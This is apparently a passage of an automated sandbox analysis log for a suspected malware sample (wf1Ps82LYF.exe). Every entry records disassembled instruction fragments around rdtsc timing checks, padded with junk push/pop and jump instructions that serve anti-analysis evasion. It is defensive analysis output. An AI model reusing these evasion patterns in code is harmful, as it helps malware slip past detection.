                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B03CEB second address: B03D21 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5D20D3D694h 0x00000007 jmp 00007F5D20D3D698h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 pop esi 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B03D21 second address: B03D25 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B03D25 second address: B03D3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F5D20D3D686h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F5D20D3D68Ch 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B03D3F second address: B03D43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B03D43 second address: B03D4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B03D4F second address: B03D5D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5D20C2475Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B07AE0 second address: B07AFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F5D20D3D694h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B0FD60 second address: B0FD7B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5D20C24766h 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B0DF15 second address: B0DF34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jnc 00007F5D20D3D686h 0x0000000c popad 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007F5D20D3D68Dh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B0E2F4 second address: B0E310 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5D20C24766h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B0E310 second address: B0E336 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jc 00007F5D20D3D6CCh 0x0000000e pushad 0x0000000f jmp 00007F5D20D3D695h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B0E66F second address: B0E679 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B0E679 second address: B0E6A6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c jne 00007F5D20D3D686h 0x00000012 jl 00007F5D20D3D686h 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a popad 0x0000001b jmp 00007F5D20D3D68Ah 0x00000020 push eax 0x00000021 push edx 0x00000022 jnc 00007F5D20D3D686h 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B0E6A6 second address: B0E6AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B0E6AA second address: B0E6B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B0E9A6 second address: B0E9B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a jnp 00007F5D20C24756h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B0ECDC second address: B0ECF0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jc 00007F5D20D3D686h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c je 00007F5D20D3D68Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B0F544 second address: B0F54A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B0F54A second address: B0F583 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F5D20D3D686h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007F5D20D3D68Bh 0x00000012 jmp 00007F5D20D3D699h 0x00000017 push eax 0x00000018 push edx 0x00000019 jc 00007F5D20D3D686h 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B15989 second address: B1598D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B1598D second address: B15993 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B15993 second address: B159A1 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F5D20C24758h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B159A1 second address: B159A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B19C31 second address: B19C48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F5D20C2475Ch 0x0000000a pop eax 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B19C48 second address: B19C4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B19C4C second address: B19C57 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B19622 second address: B19628 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B19628 second address: B19643 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F5D20C24766h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B1FF35 second address: B1FF41 instructions: 0x00000000 rdtsc 0x00000002 js 00007F5D20D3D686h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B1FF41 second address: B1FF47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B1FF47 second address: B1FF51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F5D20D3D686h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B200A9 second address: B200AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B200AD second address: B200CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F5D20D3D690h 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B200CA second address: B200EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 jmp 00007F5D20C2475Dh 0x0000000e pop edi 0x0000000f jnc 00007F5D20C2475Ah 0x00000015 pushad 0x00000016 popad 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B200EB second address: B200F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B200F0 second address: B200F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B206DE second address: B206E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B206E2 second address: B206E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B206E8 second address: B206F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B21518 second address: B2152D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5D20C24761h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B2152D second address: B21555 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F5D20D3D690h 0x0000000b pushad 0x0000000c jmp 00007F5D20D3D68Fh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B21555 second address: B21561 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F5D20C24756h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B286B8 second address: B286D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 jmp 00007F5D20D3D694h 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d pop edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B2C2F3 second address: B2C310 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5D20C24767h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B38C2C second address: B38C30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: A7089C second address: A708A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B44EF6 second address: B44F04 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop ecx 0x00000006 jc 00007F5D20D3D68Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B4CB7F second address: B4CB9B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5D20C24762h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a push edx 0x0000000b push eax 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B4E3FD second address: B4E403 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: A5F81F second address: A5F838 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push edx 0x00000006 ja 00007F5D20C24756h 0x0000000c push edi 0x0000000d pop edi 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jng 00007F5D20C24756h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: A5F838 second address: A5F83C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: A5F83C second address: A5F840 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: A5F840 second address: A5F85C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F5D20D3D693h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B560DA second address: B56103 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5D20C2475Fh 0x00000007 jnp 00007F5D20C24756h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007F5D20C24760h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B5656A second address: B56577 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jg 00007F5D20D3D68Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B56577 second address: B56580 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B5682F second address: B56833 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B56833 second address: B5684A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F5D20C24756h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d pushad 0x0000000e push ebx 0x0000000f pushad 0x00000010 popad 0x00000011 pop ebx 0x00000012 pushad 0x00000013 push edi 0x00000014 pop edi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B5684A second address: B56850 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B569CD second address: B569D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B569D1 second address: B569EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5D20D3D697h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B569EE second address: B56A10 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F5D20C24762h 0x00000008 ja 00007F5D20C24756h 0x0000000e jnc 00007F5D20C24756h 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushad 0x00000017 jc 00007F5D20C24758h 0x0000001d push ebx 0x0000001e pop ebx 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B5DACC second address: B5DAD2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B7B2D1 second address: B7B2D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B8C97F second address: B8C988 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B8C988 second address: B8C98C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B8C98C second address: B8C9A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5D20D3D692h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B8C9A2 second address: B8C9A7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B90A76 second address: B90A7A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B90A7A second address: B90A98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F5D20C24766h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B90A98 second address: B90AB3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5D20D3D691h 0x00000007 push eax 0x00000008 push edx 0x00000009 jnc 00007F5D20D3D686h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B90BD7 second address: B90BEC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5D20C24761h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B90BEC second address: B90C08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jg 00007F5D20D3D686h 0x0000000d jmp 00007F5D20D3D68Ah 0x00000012 pop ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B90C08 second address: B90C0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B90C0C second address: B90C33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 jp 00007F5D20D3D6AAh 0x0000000d jnc 00007F5D20D3D68Eh 0x00000013 jp 00007F5D20D3D686h 0x00000019 push edi 0x0000001a pop edi 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F5D20D3D68Ah 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B90C33 second address: B90C37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B913CD second address: B913F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jne 00007F5D20D3D686h 0x00000009 js 00007F5D20D3D686h 0x0000000f pop eax 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push edi 0x00000013 pushad 0x00000014 jmp 00007F5D20D3D68Ch 0x00000019 pushad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B9152D second address: B91539 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F5D20C24756h 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B93093 second address: B9309D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B95F88 second address: B95F8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B95F8D second address: B96044 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5D20D3D68Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c pushad 0x0000000d mov ax, 133Ah 0x00000011 mov ebx, dword ptr [ebp+12453F08h] 0x00000017 popad 0x00000018 adc edx, 43A0A9E7h 0x0000001e push dword ptr [ebp+122D1A3Fh] 0x00000024 push 00000000h 0x00000026 push ebp 0x00000027 call 00007F5D20D3D688h 0x0000002c pop ebp 0x0000002d mov dword ptr [esp+04h], ebp 0x00000031 add dword ptr [esp+04h], 00000016h 0x00000039 inc ebp 0x0000003a push ebp 0x0000003b ret 0x0000003c pop ebp 0x0000003d ret 0x0000003e mov edx, 6053E542h 0x00000043 call 00007F5D20D3D689h 0x00000048 jg 00007F5D20D3D69Bh 0x0000004e push eax 0x0000004f jmp 00007F5D20D3D691h 0x00000054 mov eax, dword ptr [esp+04h] 0x00000058 jnl 00007F5D20D3D698h 0x0000005e mov eax, dword ptr [eax] 0x00000060 pushad 0x00000061 jmp 00007F5D20D3D68Eh 0x00000066 jc 00007F5D20D3D68Ch 0x0000006c push eax 0x0000006d push edx 0x0000006e rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B9739F second address: B973A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B973A3 second address: B973C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007F5D20D3D68Bh 0x00000014 jnc 00007F5D20D3D686h 0x0000001a push esi 0x0000001b pop esi 0x0000001c popad 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B99156 second address: B9915C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B9915C second address: B9916E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5D20D3D68Eh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B9916E second address: B99172 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B99172 second address: B9918E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F5D20D3D694h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B9918E second address: B991C9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F5D20C24767h 0x0000000e push esi 0x0000000f push esi 0x00000010 pop esi 0x00000011 jg 00007F5D20C24756h 0x00000017 pop esi 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F5D20C2475Dh 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B991C9 second address: B991CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B98CF7 second address: B98CFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
